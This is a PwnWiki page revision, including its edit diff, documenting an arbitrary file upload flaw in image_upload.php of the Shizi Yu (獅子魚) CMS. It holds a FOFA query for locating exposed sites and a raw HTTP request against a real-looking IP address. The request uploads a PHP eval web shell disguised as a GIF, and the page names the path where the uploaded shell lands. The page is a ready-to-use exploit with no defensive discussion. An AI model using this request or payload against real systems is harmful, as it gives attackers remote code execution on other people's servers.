Difference between revisions of "獅子魚CMS image upload.php 任意文件上傳漏洞"
From PwnWiki
(Created page with "==FOFA== <pre> "/seller.php?s=/Public/login" </pre> ==Request== <pre> POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/2 Host: 47.95.36.147 Content-Type:...") |
|||
| Line 17: | Line 17: | ||
<?php @eval($_POST[pq]);?> | <?php @eval($_POST[pq]);?> | ||
------WebKitFormBoundary8UaANmWAgM4BqBSs— | ------WebKitFormBoundary8UaANmWAgM4BqBSs— | ||
| + | </pre> | ||
| + | |||
| + | ==設置返回文件路徑== | ||
| + | <pre> | ||
| + | /Common/image/uploads/xxxxx.php | ||
</pre> | </pre> | ||
Latest revision as of 10:22, 16 May 2021
FOFA
"/seller.php?s=/Public/login"
Request
POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/2 Host: 47.95.36.147 Content-Type: multipart/form-data;boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs Content-Length: 208 ------WebKitFormBoundary8UaANmWAgM4BqBSs Content-Disposition: form-data; name="files"; filename="test.php" Content-Type: image/gif <?php @eval($_POST[pq]);?> ------WebKitFormBoundary8UaANmWAgM4BqBSs—
設置返回文件路徑
/Common/image/uploads/xxxxx.php
